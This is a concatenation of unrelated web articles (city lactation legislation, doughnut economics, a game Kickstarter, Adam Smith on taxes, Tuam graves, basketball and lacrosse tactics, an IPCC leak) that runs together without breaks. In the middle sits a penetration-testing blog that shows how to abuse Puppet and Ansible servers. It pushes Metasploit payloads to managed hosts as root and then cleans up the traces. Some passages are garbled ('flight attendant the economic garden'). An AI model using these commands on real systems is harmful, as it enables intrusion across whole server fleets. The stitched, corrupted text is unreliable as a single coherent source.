Supervisor Katy Tang will introduce legislation Tuesday that would require all workplaces in the city — private and public — to have a lactation space that would include a seat, surface, electrical outlet and access to a sink. The city Department of Public Health would provide a form for women to request time from their bosses to pump, and the bosses would be legally required to accommodate the request.
The legislation would also require that all future commercial buildings include a lactation space.
State and federal law already requires private employers to make “reasonable efforts” to provide a clean space other than a bathroom where women can breastfeed or pump breast milk. But the laws do not spell out specifics, and the federal version is part of the Affordable Care Act, which Congress may soon repeal.
“New mothers who want to return to work face so many barriers, whether it's juggling child care, balancing a new schedule or figuring out how to provide breast milk for their children,” Tang said. “Although there are existing lactation laws, they do not provide minimum standards, such as a place to sit or an electrical outlet. Many women also do not feel comfortable asking their employers for lactation breaks.”
Tang's legislative aide, Ashley Summers, said their boss concluded that the city needed to act after they read an October report by the Public Health Department that found that breastfeeding rates among women living in San Francisco were lowest among those at the bottom of the income scale.
About 97 percent of new mothers in the city breastfeed in the days after giving birth, according to census data. Six months later, however, only 16 percent of women enrolled in the city's Women, Infants, and Children nutrition program — which provides support for low-income families — are still exclusively breastfeeding, the report found.
Summers, the mother of an 18-month-old girl, attributes the gap to low-income women's lack of power in the workplace and the intimate nature of talking about lactation, especially with a male supervisor.
“There's a disparity among moms who have the ability to breastfeed while going to work,” Summers said. “People like me have understanding employers who are supportive. But it was still hard to pump at work. I can't imagine what it must be like for a mom to go back at six weeks with a boss who isn't supportive.”
Priti Rane, director of the Women, Infants, and Children program, which serves about 1,000 pregnant women and 1,800 new mothers, said babies who drink formula rather than breast milk are more likely to develop asthma, obesity, respiratory infections and diabetes. Mothers who don't breastfeed are at greater risk of Type 2 diabetes, osteoporosis and ovarian cancer, they said.
“Even though they intend to breastfeed longer, they aren't able to,” Rane said. “Obviously, the big impact is health. Having a healthy baby is a huge benefit to the mom, and also, of course, the mom's health is impacted as well. This legislation will definitely provide and empower mothers who are going back to work to continue to breastfeed.”
Last year, the Board of Supervisors passed legislation introduced by Tang requiring the city to make breastfeeding as easy and comfortable as possible for city employees. Soon after, workers installed a lactation pod in the City Hall basement, which Mavet Coronel ducked into on Monday so they could breastfeed their 6-month-old daughter, Allison.
Coronel, who was attending a wedding in the rotunda, is a stay-at-home mom. They said they couldn't imagine working while trying to feed a baby.
“There is little to no breastfeeding in public,” Coronel, 28, said in Spanish. They described having to hunt for empty aisles in the grocery store where they can feed their daughter in peace.
“It's really difficult,” Coronel said. “Sometimes you have to go to the bathroom and do it. There's really no choice.”
But the business community is wary of legislation that would enact more regulations — especially for owners of small shops that barely have space for a single-stall bathroom, let alone a lactation room. Summers said Tang is open to exemptions for businesses that have a financial hardship or are too cramped.
“Our goal is to make it as workable as possible for everybody, for all businesses big and small, for all employers and their employees,” said Dee Dee Workman, vice president of public policy for the San Francisco Chamber of Commerce. “We want to make sure that small businesses are not set up to fail. Most want to do the right thing, and are doing the right thing providing accommodations to the best of their abilities. We want to make sure they are not always in the position of saying, ‘No, we can't do this.'”
A representative of the San Francisco Office of Small Business, a city agency that assists firms that have only a few employees, declined to comment on Tang's proposal. The Golden Gate Restaurant Association, which lobbies at City Hall on behalf of restaurants, did not respond to calls for comment.
Tang said they were willing to talk with businesses about how the measure should be shaped.
“Our legislation seeks to make the lactation discussion a regular part of employment conversations,” they said.
Lizzie Johnson is a San Francisco Chronicle staff writer. Email: ljohnson@sfchronicle.com Twitter: @LizzieJohnsonnn
Things are not going well in the world's richest economies. Most OECD countries are facing their highest levels of income inequality in 30 years, while generating ecological footprints of a size that would require four, five or six planet Earths if every country were to follow suit. These economies have, in essence, become divisive and degenerative by default. Mainstream economic theory long promised that the solution starts with growth – but why does that theory seem so ill-equipped to deal with the social and ecological fallout of its own prescriptions? The answer can be traced back to a severe case of physics envy.
In the 1870s, a handful of aspiring economists hoped to make economics a science as reputable as physics. Awed by Newton's insights on the physical laws of motion – laws that so elegantly describe the trajectory of falling apples and orbiting moons – they sought to create an economic theory that matched their legacy. And so pioneering economists such as William Stanley Jevons and Léon Walras drew their diagrams in clear imitation of Newton's style and, inspired by the way that gravity pulls a falling object to rest, wrote enthusiastically of the role played by market forces and mechanisms in pulling an economy into equilibrium.
People and money are not so obedient as gravity, as it turns out, so no such laws exist
Their mechanical metaphor sounds authoritative, but it was ill-chosen from the start – a fact that has been widely acknowledged since the astonishing fragility and contagion of global financial markets was exposed by the 2008 crash.
The most pernicious legacy of this fake physics has been to entice generations of economists into a misguided search for economic laws of motion that dictate the path of development. People and money are not as obedient as gravity, so no such laws exist. Yet their false discoveries have been used to justify growth-first policymaking.
Finally, a breakthrough alternative to growth economics – the doughnut | George Monbiot Read more
In 1955, the economist Simon Kuznets thought they had found such a law of motion, one that determined the path of income inequality in a growing economy. The scant data that they could gather together seemed to suggest that, as a nation's GDP grows, inequality first rises, then levels off, and ultimately starts to fall. Despite Kuznets' explicit warnings that their work was 5% empirical, 95% speculation and “some of it possibly tainted by wishful thinking”, their findings were soon touted as an economic law of motion, immortalized as “the Kuznets Curve”– resembling an upside-down U on the page – and has been taught to every economics student for the past half century.
As for the curve's message? When it comes to inequality, it has to get worse before it can get better, and more growth will make it better. And so the Kuznets Curve became a perfect justification for trickle-down economics and for enduring austerity today in the pursuit of making everyone better off some day.
Forty years later, in the 1990s, economists Gene Grossman and Alan Krueger thought they too had found an economic law of motion, this time about pollution. And it appeared to follow the very same trajectory as Kuznets' curve on inequality: first rising then falling as the economy grows. Despite the familiar caveats that the data were incomplete, and available for local air and water pollutants only, their findings were quickly labeled the “Environmental Kuznets Curve”. And the message? When it comes to pollution, it has to get worse before it can get better and – guess what – more growth will make it better. Like a well-trained child, growth will apparently clean up after itself.
Except it doesn't. If we have learned one thing from the emergent crises of recent decades – from the tipping points of climate change and the rise of the 1% to the near-collapse of financial markets – it is that it's time for economics to ditch the fake physics. Thanks to more and better data, it has become clear that such economic laws of motion simply don't exist. Far from being a necessary phase of development, extreme inequality and environmental degradation are the result of policy choices, and these choices can be changed. In the place of laws to be obeyed, there are design decisions to be made.
Facebook Twitter Pinterest From physics to gardening in just a minute: a Doughnut Economics animation by Ainslie Henderson in collaboration with Kate Raworth
So if the economy is not best thought of as a mechanism that returns to equilibrium and follows fixed laws of motion, how should we think of it? Like the living world: it's complex, dynamic and ever-evolving. And for economists, that means it's time for a metaphorical career change: from engineer to gardener. Let's take off the hard hat and give up on reaching for the economy's control levers because they simply don't exist. Instead, put on some gardening gloves, pick up a pair of secateurs, and start to flight attendant the economic garden. And if you think that sounds laissez faire, then you've never done a hard day's work in the garden: it calls for getting stuck in, digging, pruning, weeding and watering the plants as they grow and mature.
How can economic gardeners help to create a thriving economy, one that is inclusive and sustainable and will help to achieve the sustainable development goals? By following two core principles: make it regenerative and distributive by design.
Follow the laws of nature, not the laws of physics
Regenerative economic design ensures that instead of using up Earth's resources, we use them again and again and again. We learn to work with, not against, the cyclical processes of life, including those for carbon, water and nutrients. Thanks to innovations in the circular economy and cradle-to-cradle design we can start turning last century's degenerative economy into this century's regenerative one.
The world is stuck in the past, Hans Rosling showed us the way forward | Paul Currion Read more
Distributive economic design, in turn, ensures that value created is spread far more equitably among those who helped to generate it. Think employee-owned companies – such as the John Lewis Partnership and Unipart – that reward committed employees rather than short-term shareholders. Think community-owned renewable-energy systems that generate electricity along with income for community purpose. Think creative commons licensing that enables valuable innovations, like those of the Open Building Institute, to be shared, improved and used without end. Thanks to the rise of digital networks, there's more opportunity than ever to turn last century's divisive economy into this century's distributive one.
So how can economic policymakers be more like gardeners in their approach? They should think of policy as an adapting portfolio of experiments, says Eric Beinhocker, a leading thinker in the field of evolutionary economics. We should mimic nature's process of natural selection, which can be summed up as diversify-select-amplify: set up small-scale policy experiments to test out a variety of interventions, put a stop to the ones that don't work and scale-up those that do. Nobel-prize-winning political scientist Elinor Ostrom agreed. “We have never had to deal with problems of the scale facing today's globally interconnected society,” they wrote. “No one knows for sure what will work, so it is important to build a system that can evolve and adapt rapidly.”
Activism is mainstream again … how can protests create change? | Saira O'Mallie Read more
Realising that the economy is ever-evolving is an empowering insight. If complex systems evolve through their innovations and deviations, then this gives added importance to novel initiatives – from complementary currencies to open-source design – that are at the leading edge of new economic design.
Better still, every one of us can have a hand in shaping the economy's evolution. Not just in how we shop, eat and travel, but in how we volunteer, invest and protest. In how we set up new businesses, save for our pensions, license our inventions, and power our homes. Who knows, we could just turn out to be butterflies that stir up powerful winds of change.
Doughnut Economics: Seven Ways to Think Like a 21st-Century Economist by Kate Raworth is out now, published by Penguin Random House.
To pitch an idea for our Optimistic thinking for 2017 series, email globaldevpros@theguardian.com.
Join our community of development professionals and humanitarians. Follow @GuardianGDP on Twitter.
Shenmue 3 Kickstarter Already Funded, Game Expected to Release in December 2017
Taking roughly nine hours, the Shenmue 3 Kickstarter reached its $2 million goal, meaning the game will be coming to the PlayStation 4 and PC.
According to the rewards section, Shenmue 3 will release as a digital-only title on PS4 in December 2017, while PC gets it physical and digital.
Here's what the Kickstarter page says about Shenmue 3:
Shenmue 3 is the true sequel to the classic open world action RPG games, Shenmue and Shenmue 2. Created for modern platforms (PC and PlayStation 4) and built in Unreal 4, Shenmue 3 will continue the legacy of Shenmue. Shenmue 3 will have familiar elements from its predecessors and new fight mechanics to achieve a new level of interactive storytelling.
If this project reaches its funding goal, Shenmue 3 will be available on the PS4 and PC.
Our ambition is to deliver a Shenmue experience that will draw in newcomers to the series and reward diehard fans with its deep story and rich gameplay. Where we left off… Ryo Hazuki has made their way to China in search of their father's killer. There they meet a new travelling companion, Shenhua, and learns of a legend from their village that has foretold their path together. The story continues as Ryo and Shenhua start off on a new journey that will take them farther into enemy territory, deeper into mystery, and ever closer to their destiny. Will the mystery of the mirrors be revealed? How is Ryo's father connected to all of this? Will Ryo track down the Chi You Men cartel and face Lan Di in a final showdown?
Sitting at $2.4 million as of 8am/11am, these are the stretch goals for Shenmue 3:
$2.5 million – Shenmue 1 & 2 cinema shorts
$2.6 million – German subtitles
$2.7 million – French subtitles
$2.8 million – Spanish subtitles
$2.9 million – Italian subtitles
$3.2 million – Rapport system
$3.5 million – Skill Tree system
$4 million – Baisha Village expanded, Mini Games x5
In the Risks and Challenges section, they talk about development, saying they have “an experienced team, deeply connected with the Shenmue franchise.” As with any project, there could be delays depending on how things go. If a potential delay does happen, “the whole Shenmue 3 team promises to keep you updated and informed on the game development and reward delivery progress.”
Have you backed Shenmue 3?
[Source: Kickstarter]
I have recently been told twice, once in conversation and once online, that Adam Smith favored progressive taxation—on the second occasion at least, that they favored a progressive income tax. One passage from The Wealth of Nations was offered in support of the claim by both people, some additional ones by the online claimant. The passage:
The subjects of every state ought to contribute towards the support of the government, as nearly as possible, in proportion to their respective abilities; that is, in proportion to the revenue which they respectively enjoy under the protection of the state.
Taxation in proportion to revenue isn't progressive taxation, it's proportional taxation—in modern terminology, a flat tax. The quote not only isn't evidence for the claim, it's evidence against it—important evidence, since it is the first of the maxims of taxation with which Smith introduces their discussion of possible taxes.
Not only is Smith not endorsing a progressive income tax, they aren't endorsing any sort of income tax. Reading further into the passage, they successively reject taxes on income from capital, taxes on wages, and taxes on the income of professionals. The only income they approve of taxing is the income of government officials. What they are arguing for is a system of taxation whose effect is proportional to income, not a tax on income.
The online claimant offered a number of other quotes which they thought provided evidence that Smith was in favor of progressive taxation. One of them was actually evidence, not that they favored it, but that they regarded a tax that fell more than proportionally on the rich as tolerable--"not very unreasonable."
But the most interesting one was the following:
It must always be remembered, however, that it is the luxuries, and not the necessary expense of the inferior ranks of people, that ought ever to be taxed.
This was offered as evidence that Smith wanted to tax the luxuries of the rich rather than the necessities of the poor. It was offered in the same words, with the same interpretation, on a Daily Kos web page I found which was making the same argument and using the same quotes.
Here is the full paragraph whose first sentence is being (mis)quoted.
It must always be remembered, however, that it is the luxurious and not the necessary expense of the inferior ranks of people that ought ever to be taxed. The final payment of any tax upon their necessary expense would fall altogether upon the superior ranks of people; upon the smaller portion of the annual produce, and not upon the greater. Such a tax must in all cases either raise the wages of labour, or lessen the demand for it. It could not raise the wages of labour without throwing the final payment of the tax upon the superior ranks of people. It could not lessen the demand for labour without lessening the annual produce of the land and labour of the country, the fund from which all taxes must be finally paid. Whatever might be the state to which a tax of this kind reduced the demand for labour, it must always raise wages higher than they otherwise would be in that state, and the final payment of this enhancement of wages must in all cases fall upon the superior ranks of people.
Note, first, that the first sentence is talking about "the luxurious and not the necessary expense of the inferior ranks of people." Smith is arguing, not for taxing the luxuries of the rich, but the luxuries of the poor. Changing that to "the luxuries, and not the necessary expense of the inferior ranks of people" makes it possible to misread it as "the luxuries of the rich, and not ... ."
That misreading is impossible if you read the rest of the paragraph. Smith's argument is that a tax on the necessities of the poor will raise wages, hence be paid by the rich, and that one should therefor tax the luxuries of the poor instead. Not only is they not arguing for taxing the rich, they are arguing against taxing the rich.
There is another very popular misreading of Smith which was not made by either of the people I was arguing with, but does show up on the Daily Kos web page and in a variety of other places—the claim that Smith supported public schooling. The web page quotes (from another web page):
For a very small expence the public can facilitate, can encourage, and can even impose upon almost the whole body of the people the necessity of acquiring those most essential parts of education.
Smith has a long discussion of possible ways of organizing and funding education, in the course of which they argue both for and against a variety of alternatives, so it is easy enough to select out a passage which appears to be for government provision, such as this one. For an example on the other side:
"Those parts of education, it is to be observed, for the teaching of which there are no public institutions, are generally the best taught."
Their final summary statement on the subject, however, is:
The expense of the institutions for education and religious instruction is likewise, no doubt, beneficial to the whole society, and may, therefore, without injustice, be defrayed by the general contribution of the whole society. This expense, however, might perhaps with equal propriety, and even with some advantage, be defrayed altogether by those who receive the immediate benefit of such education and instruction, or by the voluntary contribution of those who think they have occasion for either the one or the other.
Or in other words, some public funding of schooling is not unjust, but an entirely private system is also not unjust and might even be preferable.
The public can facilitate this acquisition by establishing in every parish or district a little school, where children may be taught for a reward so moderate that even a common labourer may afford it; the master being partly, but not wholly, paid by the public, because, if they were wholly, or even principally, paid by it, they would soon learn to neglect their business. It's also worth noting that the public involvement they are considering is much less than what we take for granted. Thus they write, immediately after the sentence that the web page quotes:
Not, I think, an opinion that supporters of our public school system would be willing to endorse.
I find it amusing that the Daily Kos piece starts out with:
"Conservatives love to quote Adam Smith, the Father of Capitalism. But I doubt that many of them have actually read their works."
The Catholic Church in Ireland is facing fresh claims of child abuse after the discovery that nearly 800 children were buried in secret mass graves at a former home for unmarried mothers.
Records uncovered by a local resident suggest that 796 children died at the single mothers' home in Tuam, County Galway, in the 35 years it was supervised by the Church. The bodies are believed to have been interred in the building's septic tank, which was "converted to serve as a disposal site", reports Al Jazeera.
The home, which reportedly doubled as an orphanage, was run by nuns between 1925 and 1961.
A government inspection in 1944 revealed severe malnutrition among the 271 children housed there. The new evidence suggests that most of the children who died – many of whom were babies and toddlers – succumbed to sickness or disease.
"Ireland had one of the highest infant mortality rates in Europe during the first half of the 20th century," The Guardian reports.
Remains were discovered at the site when the buried tank was uncovered by housing developers in the 1970s, but at the time they were taken to be victims of the Irish famine.
According to the Daily Mail, the emergence of this new evidence could lead to a full excavation of the burial site after formal complaints were submitted to the Irish police.
Church officials in Galway say they had no idea so many children died at the orphanage.
Lineup: Patrick Beverley, James Harden, Chandler Parsons, Terrence Jones, Dwight Howard
Minutes Played: 180
Offensive Rating: 114.6 points per 100 possessions
Defensive Rating: 97.8 points per 100 possessions
How it works offensively
For years, the Rockets worked toward a day when they could employ elite talent to create an offense around basketball's most efficient shots. With the acquisition of Dwight Howard, that day has arrived in Houston.
The numbers are outrageous: 53 percent of the starting unit's shot attempts have been taken in the basket area, and another 26.3 percent of them come from beyond the arc. That means nearly four out of every five shots for this unit originate from one of the sweetest spots on the floor -- almost unheard of. Per 48 minutes, this lineup has scored 14.7 points more than its opponents just at the rim, coming into Thursday night.
James Harden, Howard & Co. generate these premium shots by adhering to two basic objectives: Don't let the defense get set, and find the quickest, best shot off the first action. There's an assumption that the Rockets' starters have appropriated the offense of Howard's Orlando Magic teams from a few years back: “Surround Howard with shooters, and go from there.”
Yes and no.
Howard's Orlando teams launched from long range, but those shots were products of more deliberate half-court sets. The Rockets are a little less orderly, though the starters are hardly their most frenzied unit.
All five guys can do positive things in transition. They also initiate a lot of possessions with early drag screens on a controlled break, with the intention of maintaining that break long enough for the ball to find an open guy. Unlike the Magic, with their four proficient outside shooters fanned out in spatial perfection around Howard, their Houston quartet is involved in a more jagged, improvisational production.
A good number of these early screens are built around Harden, who lords over the chaos. They love to attack a defense that's still getting organized, barreling into contact, maneuvering their way to the rim, stepping back for a jumper or generally creating mischief. They manufacture these points at will. If the defense sinks, he'll kick the ball out -- often with the intention of getting it back.
James Harden thrives in the chaos created by the Rockets' offense. Cameron Browne/NBAE/Getty Images
Lately, defenses have been giving Harden a bit more cushion to shoot. One coach recently privately conceded that given Harden's knack for drawing fouls, and their middling numbers from long range, yielding a little space to Harden isn't the worst strategy.
But Harden isn't the only option early. On the weak side, Terrence Jones might make a basket cut, or Chandler Parsons will trail, pick up the ball on the move or catch a pass in stride before stepping into a 3-pointer. Parsons has exceptional court vision, so they can move the Rockets into their next action if the shot isn't there. Patrick Beverley isn't much of a spot-up threat but isn't a bad place to have the ball early because that allows Harden to get on the move against a discombobulated defense.
This unit's slower half-court stuff isn't all that systematic, much of it designed around post feeds for Howard. They have more vision down low than we give them credit for, and gathers information as they back a guy in. When Howard is on the left block with the ball, they spin low and finishes with their left if they don't see help coming along the baseline. If they do, they turn middle and moves into their running hook. This isn't anywhere close to the Rockets' most efficient offense, but if Howard on the block is the gristle on the steak, the team is in good shape.
Naturally, Harden gets plenty of opportunities to isolate when the game slows down. They know where the vacant spots and empty lanes are on the floor. Harden makes a handful of bad decisions per night, but the volume of creativity more than compensates for it. The aesthetics leave something to be desired -- the constant head-jerks and flailing are like bad miming -- but it's hard to argue with the production.
The Rockets now have increasing faith in Beverley to get them into a half-court possession, but their first two imperatives are still to get the ball into the hands of Harden (off a pin-down, curl, etc.) and Howard (simple entry pass). Beverley is the weak link offensively but doesn't cost this unit a lot. He's just passable enough from 3 to require some monitoring, and he's not a bad distributor even if they don't rise to the level of playmaker. All in all, Beverley plays a smart game. In parts of two seasons now with Houston, he's put up some of the team's best overall on-off ratings.
Kevin McHale has some old-school sensibilities and likes to hunt for a specific matchup advantage and call that number. Against the Warriors recently, Terrence Jones got a bunch of opportunities to work one-on-one opposite David Lee, and torched him. Two nights later, the Rockets looked for Howard against Glen Davis, with Howard raising their hand on the block like a guy trying to get a server's attention.
This extends beyond individual matchups. The Houston starters are quick to recognize when they have a tactical edge. Up against the paint-packing Spurs in that nutty game a couple of weeks back, they drove at sagging defenders then looked outside and generated a couple dozen good looks from long distance. Against an interior-minded defense, they'll also run a dribble handoff with Howard and either Parsons or Harden way, way up top. If the small defender can't get over Howard, the shot is going up without hesitation.
That might be the defining characteristic of this unit -- decisiveness. The ball doesn't always pop around the half court, not with Harden and Howard taking their fair shares of touches for one-on-one situations. But even those possessions are characterized by a clear purpose.
How it works defensively
With Howard situated in the middle of the defense, the Rockets are implementing the inverted principles that guide their offense -- denying opponents good shots at close range and open looks from behind the 3-point line.
Remember that stat up top that highlighted the Rockets taking four out of every five shots either at the immediate basket area or from beyond the arc? For the starters' opponents, that combined number is a paltry 55.6 percent. That's the equivalent of facing a Doug Collins-coached offense every single night.
The starters take full advantage of the luxury that accompanies a center like Howard underneath. Howard is a patient, mobile rim defender who might have lost some bounce over the past couple of seasons but has cultivated a veteran big man's nose for sniffing out schemes.
At first blush, it might appear as if Howard is less aggressive, but there's clearly a defensive mandate to hang back, guard the rim and avoid triggering a rotation. Against pick-and-rolls, Howard isn't a Duncan-esque extremist when it's time to drop, though he's certainly inclined to maintain interior control. They commit very early to the driver, and weakside defenders are on alert early.
Dwight Howard isn't as spry as they once are, but they still must be reckoned with on defense. Nathaniel S. Butler/NBAE/Getty Images
Jones usually follows the same tack as a pick-and-roll defender, immediately corralling the ball handler, arms extended. But if Jones' counterpart at the 4 is a threat, the Rockets will switch up the coverage. Jones might jump out hard on the pick then scamper back or have Howard tag their man.
Against lethal scorers and playmakers, there are instances when the Rockets will launch a blitz and double the ball -- and not just against a high screen. Playing small against Golden State, Beverley and Jones trapped Stephen Curry deep in the backcourt as soon as the ball crossed the timeline. And even with Howard underneath, the Rockets will send another body at an opposing big man working on the block, as they did Thursday night in spots against LaMarcus Aldridge.
One of the better barometers for a defense is how well it responds when it has to improvise. The Rockets adapt well, aided in large part by Howard's strong ability to buy time for Beverley or Harden and Jones' flexibility as a guy who can hold their own against most bigs and wings. Howard will rove more than most goalie-centers, but he's become a bit more selective as a helper and weakside menace. They no longer feels the need to contest anyone and anything in their field of vision and doesn't enjoy defensive commutes as much as they once did.
The Rockets have found something in Beverley, who gives them a capable on-ball defender who has the wherewithal to monitor what's going on behind him, how much time Howard can buy them on a given action and when not to gamble. They aren't an easy guy to beat off the dribble, and when an opposing player dumps the ball off then simply tries to clear through, Beverley loves to bump them off course.
Harden doesn't contribute much defensively. He's not a guy who closes out with any effectiveness, and help from Harden generally means an idle stab at the ball while the driver zooms past. It's impossible to know for sure since Harden has never been a motivated defender, but the presence of Howard seems to serve as yet another crutch for Harden's when-the-feeling-strikes brand of defense.
Parsons is an average defender and Jones is a bit undersized in the half court, but as a tandem they're insanely athletic, which comes in handy when the game turns into a track meet. Both forwards lend the defense a degree of versatility, because both can hold their own on the perimeter and in the post against most competition. With Beverley pressuring the ball up top and Howard guarding the paint down low, it's a defense that can check just about every box.
A scientific panel set up by the United Nations has found that climate change will pose a serious threat to the world's food supply in the coming decades, reports The New York Times. The findings aren't set to be announced until March and are still undergoing editing, but a copy of the report has leaked online. The findings come from the Intergovernmental Panel on Climate Change (IPCC), which has been releasing reports on the matter around every six years — the Times reports that its 2007 findings were far less foreboding.
Agricultural output could drop two percent each decade
According to the Times, the report says that agricultural output may drop by as much as two percent every decade for the rest of this century, compared to what it would have been without the effects of climate change. Demand for food is reportedly expected to rise 14 percent each decade during that time, exacerbating the food supply issue.
The IPCC's study reportedly also finds that the impact of climate change is already being felt worldwide, and that it'll likely intensify as greenhouse gas emissions rise. Evoking scenes from a disaster film, the Times reports that the IPCC's draft warns that many plant and animal species could go extinct as temperatures and sea levels rise. It may not be too late to mitigate the effects, however, by cutting emissions. The study reportedly finds that some of the strongest impacts can still be avoided, though the signs of improvement likely wouldn't be felt until later the century.
"[The report is] a work in progress," Jonathan Lynn, a spokesperson for the IPCC, tells the Times. "We don't have anything to say about the contents. It's likely to change."
The IPCC's reports continue to leak
The IPCC has dealt with this kind of leak before, leading to the panel facing sharp criticism of its findings even before their release. Most recently, the panel found that humans were the cause of climate change, a factor that clearly plays heavily in its upcoming report. Though much could still change before its proper release, the Times notes that when another climate change report leaked in August, very little was changed before its publication in September.
Efforts are already being taken to address climate change from high in the US government, with President Obama issuing an executive order early today that will have government agencies preparing for its effects. For now, such efforts still fall far from what the IPCC's findings suggest is necessary.
Introduction
Confusion generally prevails while hacking an infrastructure that is not integrated with Active directory. Lateral movement is generally dependent on password spraying and common vulnerability availability. This blog will touch upon IT Operators tools - Puppet and Ansible - that is used to automate the process of managing these non-domain systems as well as cover the topic on how a hacker (or pentester) could utilize these tools to laterally move in the environment.
Thanks to bitvijays for their help to make me understand the working of Puppet. :)
Non - Active Directory Infrastructure and Hypervisors
Before we begin, I would like to bring something funny that I noticed almost in every client that I have been to while testing on the Non-Active Directory Infrastructure. I would say that a non-AD infra becomes fairly simple to compromise if you have access to the active directory and the domain administrator. And the key to this is the hypervisors. No matter how isolated the infrastructure requirement has been, I have always noticed people hosting them on a hypervisor that is actually connected to the domain. FAIL!
Puppet Infrastructure
Puppet is a pull type configuration managing service. What I mean by this is, there is a Puppet Server where the administrator creates configurations and the Puppet clients pull this configurational change and execute on their respective systems. This would mean that an administrator would either need to manually do it on every system after implementing a change or run a scheduled task on puppet clients to sync with the server.
Below is a small diagramatic representation of a Puppet infrastructure.
Directory structure of Puppet
Puppet Server generally has its configurations saved in /etc/puppet/code/
1 2 3 4 5 6 7 8 9 10 11 /etc/puppet/code\ |- environment\ |- production\ |- manifest\ | |- site.pp |- modules\ | |- module_name\ | | |- files\ | | | |- <files to be deployed> | | |- manifests\ | | | |- init.pp
Puppet for Hackers - pwnpet.sh
During the reconnaisance phase, the attacker can identify the puppet server from any of the puppet clients by looking into /etc/puppet/puppet.conf
Assuming you have access to the Puppet server, below would be the tutorial that would be helpful in pwning the puppet servers.
I have built an automated script to push malicious metasploit code to the puppet agents. The code is available at Random-Hacking-Scripts/pwnpet.sh
What this script basically does is, it creates output folder with 2 folders in it
1 2 3 4 5 6 7 8 9 output_folder\ |- manifests\ | |- site.pp |- modules\ | |- my_file\ | | |- files\ | | | |- payload | | |- manifests\ | | | |- init.pp
Now, all that is required to be done is to take the my_file folder and add the entire folder into /etc/puppet/code/environment/production/modules/ directory. Also, we would need to include my_file in /etc/puppet/code/environment/production/manifests/site.pp
1 2 3 node 'puppetclient' { include my_file }
Remember to include my_file in every node that you would like to obtain a metaspoit session on.
Now all you need to do is wait on the terminal running metasploit (that was open during the execution of pwnpet.sh)
I have made a small video demonstration of running this script on the below architecture
Here is a video demonstration of the script -
Ansible Infrastructure
Ansible on the other hand is a Push type configuration managing service. This means, an administrator can login into the Ansible server and push new configurations out to the Ansible clients.
Below is a small diagramatic representation of an Ansible infrastructure.
Fun Fact:
Check the ansible hosts file in the server at /etc/ansible/hosts, you will get information regarding all the servers managed by that server along with either their ssh keys or their passwords. You really don't need to deploy metasploit payloads using ansible server then.
Ansible for Hackers - pwnsible.sh
Using ansible to propagate is quite simple. All you need to do is, create a metasploit payload using msfvenom (let us call it payload.file) and save it on /etc/ansible/ folder on the Ansible Server. After this, you'll need to run the following 3 commands on the Ansible server -
1 2 3 root@ansibleserver$ ansible <ansibleclient> -m copy -a "src=/etc/ansible/payload.file dest=/tmp/" -u root root@ansibleserver$ ansible <ansibleclient> -m shell -a "chmod +x /tmp/payload.file" -u root root@ansibleserver$ ansible <ansibleclient> -m shell -a "/tmp/payload.file"
I have however, created an automated script for ansible pwnage for easier usage which is available at Random-Hacking-Scripts/pwnsible.sh
Clean up
Puppet server
From /etc/puppet/code/environment/production/manifests/site.pp edit and remove “include my_file”
From /etc/puppet/code/environment/production/modules/ remove the folder “my_file”
Puppet client
After you get the meterpreter session, make sure you delete the file at /tmp/payload
Ansible Server
Delete the file saved in /etc/ansible/payload.file
Ansible Client
(Inside Lacrosse Photo: Dave Anderson)
Most of the focus on the Ohio State offense this season has been centered around a pair of Canadian attackmen, senior Eric Fannell and first-year student Tre Leclaire. Thus, the tendency has been to get caught up in some of their box inspired, 2-man actions that they will sometimes run.
However, getting too caught up on that aspect of their offense obscures what really separates it. Head coach Nick Myers and offensive coordinator Brad Ross have built one of the deepest, most versatile units in the country. What makes them so unique is the ability to mix and match personnel to fit the scheme they want to run on any particular possession. It is to most offenses what a build your own ice cream sundae bar is to a conventional dessert menu or what Build-A-Bear is to a traditional teddy bear.
Fannell and Leclaire have been the foundational scoops of ice cream on which the sundae is built, but there are a whole bunch of different options for toppings.
Ohio State will play as many as eight other players in meaningful roles on offense with a variety of different skill sets. Of those 10 players, there are four Canadians and six Americans, six righties and four lefties, and six who can play attack or midfield.
Thus, they have the potential to roll out a group with a bunch of American split dodging midfielders and run fairly traditional field lacrosse type offenses with a touch of Canadian finishing. Or play all four of their Canadians in a three righties and three lefties group to attack the middle of the field with box inspired wing picks. Or they can run attackmen out of the box to take defensive midfielders behind the cage and initiate out of invert sets. They can attack from up top, from the wings or from X either one on one or from the 2-man game.
They will run so many different groups at midfield and move guys around that there isn't really a constant first and second midfield.
Colin Chell is usually the third attackman alongside Fannell and Leclaire and will often play at X in between those two, but is probably at their best playing inside as a finisher.
Last weekend against Duke they played midfield as the Buckeyes started Jack Jasinski at attack and Chell demonstrated their ability to create as a wing dodger against short stick defensive midfielders.
Whether they play them both at midfield as they have for most of the second half of the season or start Jasinski at attack like they did against Duke, Ohio State often relies on a big-little two-man game with Jasinski and Lukas Buckley initiating from X. It is somewhat of a thunder and lightning combination with the smaller quicker Jasinski drawing a long pole and the more powerful Buckley bringing SSDMs behind.
Johnny Pearson is a big lefty shooter who can be a load to handle when they lean into their man as a dodger and often provides the mirror image spacing to Leclaire as an outside shooting threat. Since they are Canadian, people often think of them mostly as a 2-man game, pairs set type player and while they certainly do that, like Leclaire and Fannell, they are versatile enough to fit into just about anything that Ohio State wants to run.
Austin Shanks is a Canadian righty who isn't the most explosive dodger, but has a slick stick as a finisher or running the 2-man game with Leclaire. They played a bigger role for them last year including a number of starts at attack, but has scored most of their damage this year on the man-up.
Tyler Pfister, JT Blubaugh and John Kelly fit more into the mold of what you think of as 2-handed American split dodging midfielders. With the injury to Ryan Terefenko during their 1st round win over Loyola, Kelly moved to SSDM to take their spot. These are the three players that allow Ohio State to be effective in the 5 around 1, triangle rotation type sets that are traditional American field lacrosse offenses despite all of their Canadian scorers. Often times that means putting Leclaire and Fannell in positions on the crease where teams either are sliding from them to pop off the crease and catch a throw back or roll back pass.
The more American 2-handed skill sets also work in the box style pair sets to draw slides and set up Leclaire and Fannell to finish.
Of course, that doesn't mean that setting picks on the wing for Leclaire isn't a significant part of their offense.
However, rather than being what defines this offense, that is better viewed as just one of the many ways that they can attack. Rather, it's their ability to attack so many different ways from so many different places on the field with so many different players.
The chief motivation for moving the RBB blog to Patheos is to circumvent the increasingly frequent blocking of our site at many military bases.
These bases allow similar content from religious perspectives, so it's not just some blanket policy on blogs. Frankly, this is likely to come up again (and again). Even the main website for the festival we launched was blocked by many military bases, despite the event being largely staffed by DoD personnel. Blogging with ferocious activists like Chris Rodda probably did not help (worth it, love ya Chris!)
